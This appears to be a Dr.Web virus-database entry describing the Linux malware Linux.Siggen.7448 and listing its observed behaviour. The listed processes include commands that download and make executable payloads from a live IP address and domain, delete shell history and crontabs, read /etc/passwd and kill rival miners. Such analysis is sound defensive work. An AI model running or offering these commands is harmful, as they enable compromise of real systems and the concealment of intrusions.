Linux.Siggen.7448
Added to the Dr.Web virus database: 2024-05-13
Virus description added: 2024-05-13
Technical Information
Malicious functions:
Removes itself
Launches processes:
- curl -s -L -O 45.88.67.94/network
- <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' "$@" <SAMPLE_FULL_PATH>
- rm -rf /root/.bash_history
- chmod +x iplist ips iptemp retea
- grep -v false
- cat .usrs
- /usr/bin/pgrep pkill haiduc
- mkdir /dev/shm/.x
- chmod +x network
- sed 1d iptemp
- grep -v nologin
- cat ips
- rm -rf xmrig .diicot .black Opera
- curl -O -s -L arhivehaceru.com/payload
- rm -rf /dev/shm/retea /dev/shm/.magic
- wget -q 45.88.67.94/network
- uniq
- chmod +x .teaca
- /usr/bin/pgrep pkill Opera
- crontab -r
- /usr/bin/pgrep pkill xMEu
- grep -v sync
- sleep 3
- rm -rf .black xmrig.1
- grep 192.168
- rm -rf retea ips iptemp ips iplist
- /usr/bin/pgrep pkill java
- rm -rf .retea
- rm -rf pass
- cut -d: -f1
- /usr/bin/pgrep pkill xrx
- /usr/bin/mawk awk -F. {print $1"."$2}
- wget -q arhivehaceru.com/payload
- /usr/bin/pgrep pkill blacku
- /usr/bin/pgrep pkill xmrig
- /usr/bin/mawk awk {print $1}
- cat retea
- mkdir /tmp/.tmp
- wget -q 45.88.67.94/ps
- <0x2f>
- rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp
- curl -s -L -O 45.88.67.94/ps
- grep 10.
- rm -rf /dev/shm/.x /root/retea iplist ips iptemp pass retea <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /root/stub.sh
- grep -v halt
- cat /etc/passwd
- ip r
- grep -v shutdown
- rm -rf .bash_history /root/.bash_history
- /usr/bin/pgrep pkill cnrig
- chmod +x payload systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
- grep -c . .usrs
- grep 172.
- sleep 1
- chmod +x ps
Performs operations with the file system:
Modifies file access rights:
- /var/tmp/payload
- /var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi
- /var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
- /dev/shm/.x/iplist
- /dev/shm/.x/ips
- /dev/shm/.x/iptemp
- /dev/shm/.x/retea
Creates folders:
Deletes folders:
Creates or modifies files:
- /var/tmp/payload
- /dev/shm/.x/retea
- /dev/shm/.x/ips
- /dev/shm/.x/iptemp
- /dev/shm/.x/iplist
- /dev/shm/.x/.usrs
- /dev/shm/.x/pass
Deletes files:
- /root/.bash_history
- /.x/pass
- /.x/.usrs
- /.x/iplist
- /.x/iptemp
- /.x/ips
- /.x/retea
- /root/run.sh
- /root/stub.sh
Network activity:
Establishes connection:
- 8.#.8.8:53
- 12#.##.94.177:80
- 45.##.67.94:80
DNS ASK:
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects OS information
Collects CPU information